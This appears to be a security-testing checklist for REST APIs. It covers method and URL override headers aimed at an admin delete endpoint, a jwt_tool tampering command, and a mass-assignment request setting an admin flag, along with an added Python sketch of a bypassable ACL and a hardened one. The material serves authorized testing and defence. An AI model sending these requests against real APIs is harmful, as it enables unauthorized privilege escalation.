REST API - Bypasses and Privilege Escalations

REST API security testing

Methodology

Bypassing API filters and ACLs by rewriting HTTP methods and URLs

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-Http-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser
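Added example (not from the original page): it models why an ACL that inspects only the raw request line can be bypassed through the override headers listed above, and how a hardened check resolves the effective method and URL first. The header names come from the page; the header precedence, the ACL table and the sample requests are constructed assumptions, not any specific framework's behaviour.

```python
# Added example, not from the original page: shows an ACL evaluated on the raw
# request line (bypassable via override headers) beside one evaluated on the
# effective request. Header names are from the page; ACL/samples are constructed.
# Precedence order is an assumption: real frameworks differ in which header wins.
METHOD_OVERRIDE_HEADERS = (
    "x-http-method-override", "x-http-method", "x-method-override", "x-original-method",
)
URL_OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
# Constructed ACL: (method, path) -> roles allowed.
ACL = {
    ("GET", "/api/profile"): {"user", "admin"},
    ("PATCH", "/api/profile"): {"admin"},
    ("POST", "/api/profile"): {"user", "admin"},
    ("POST", "/admin/deleteUser"): {"admin"},
}

def override_headers_present(headers):
    """Names of any method/URL override headers in the request, for logging or alerting."""
    names = {k.lower() for k in headers}
    return sorted(n for n in METHOD_OVERRIDE_HEADERS + URL_OVERRIDE_HEADERS if n in names)

def resolve_effective_request(method, path, headers):
    """Apply override headers the way an override-honouring framework would (a model, not a real framework)."""
    lower = {k.lower(): v for k, v in headers.items()}
    for name in METHOD_OVERRIDE_HEADERS:
        if name in lower:
            method = lower[name].strip().upper()
            break
    for name in URL_OVERRIDE_HEADERS:
        if name in lower:
            path = lower[name].strip()
            break
    return method, path

def acl_allows(method, path, role):
    return role in ACL.get((method, path), set())

def vulnerable_authorize(method, path, headers, role):
    """Flawed: authorizes on the raw request line; the framework applies the override afterwards."""
    return acl_allows(method, path, role)

def hardened_authorize(method, path, headers, role):
    """Authorize on the effective request, i.e. after the same override resolution the framework applies."""
    eff_method, eff_path = resolve_effective_request(method, path, headers)
    return acl_allows(eff_method, eff_path, role)
```

Pair the hardened check with `override_headers_present` in request logging so any override attempt from an untrusted client is visible in detection.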

Access Admin Interface

Using HTTP headers that rewrite the trusted client IP address or Host.

JWT Access Token Tampering

JWT Editor : Burp plugin

Available in the BApp Store; see also the advanced JWT header attacks at https://portswigger.net/web-security/jwt#jwt-header-parameter-injections

JWT Tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

python3 ./jwt_tool.py -M pb -t http://URL:5001/api/method -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

Mass Assignment

Observe object properties and try to set them (search for hidden parameters with Param Miner).

POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true }

API Tester

Vulnerable API Project to practice with
